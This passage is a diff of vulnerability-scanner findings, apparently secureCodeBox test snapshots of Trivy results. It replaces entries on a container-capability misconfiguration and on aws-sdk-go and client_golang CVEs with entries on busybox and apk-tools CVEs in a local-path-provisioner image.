"fixedVersion": "2.10.6-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-30139", + "installedVersion": "2.10.5-r1", + "packageName": "apk-tools", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", + "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Finding in Dependency apk-tools (2.10.5-r1)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2021-30139", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", + }, + { + "type": "URL", + "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.40.54", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "1.31.1-r20", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-28831", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "https://access.redhat.com/security/cve/CVE-2021-28831", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", + "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "https://security.gentoo.org/glsa/202105-09", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://ubuntu.com/security/notices/USN-5179-2", + "https://www.cve.org/CVERecord?id=CVE-2021-28831", ], }, "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", + "name": "busybox: invalid free or segmentation fault via malformed gzip data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://avd.aquasec.com/nvd/cve-2021-28831", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "https://access.redhat.com/security/cve/CVE-2021-28831", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://security.gentoo.org/glsa/202105-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://ubuntu.com/security/notices/USN-5179-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.40.54", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42378", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "https://access.redhat.com/security/cve/CVE-2021-42378", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42378", ], }, "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", - }, - { - "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://avd.aquasec.com/nvd/cve-2021-42378", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://access.redhat.com/security/cve/CVE-2021-42378", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.11.1", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-21698", - "installedVersion": "v1.11.0", - "packageName": "github.com/prometheus/client_golang", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42379", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8057", - "https://access.redhat.com/security/cve/CVE-2022-21698", - "https://bugzilla.redhat.com/2044628", - "https://bugzilla.redhat.com/2045880", - "https://bugzilla.redhat.com/2050648", - "https://bugzilla.redhat.com/2050742", - "https://bugzilla.redhat.com/2050743", - "https://bugzilla.redhat.com/2065290", - "https://bugzilla.redhat.com/2107342", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107376", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2107390", - "https://bugzilla.redhat.com/2107392", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", - "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", - "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", - "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://errata.almalinux.org/9/ALSA-2022-8057.html", - "https://errata.rockylinux.org/RLSA-2022:8057", - "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", - "https://github.com/prometheus/client_golang/pull/962", - "https://github.com/prometheus/client_golang/pull/987", - "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", - "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", - "https://linux.oracle.com/cve/CVE-2022-21698.html", - "https://linux.oracle.com/errata/ELSA-2022-8057.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", - "https://pkg.go.dev/vuln/GO-2022-0322", - "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "https://access.redhat.com/security/cve/CVE-2021-42379", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42379", ], }, "category": "Vulnerability", - "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Denial of service using InstrumentHandlerCounter", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-21698", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8057", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-21698", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2044628", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2045880", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2050648", + "value": "https://avd.aquasec.com/nvd/cve-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050742", + "value": "https://access.redhat.com/security/cve/CVE-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050743", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2065290", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107342", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107376", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42380", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42380", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42380", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2107390", + "value": "https://avd.aquasec.com/nvd/cve-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107392", + "value": "https://access.redhat.com/security/cve/CVE-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42381", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42381", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42381", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://avd.aquasec.com/nvd/cve-2021-42381", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://access.redhat.com/security/cve/CVE-2021-42381", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", 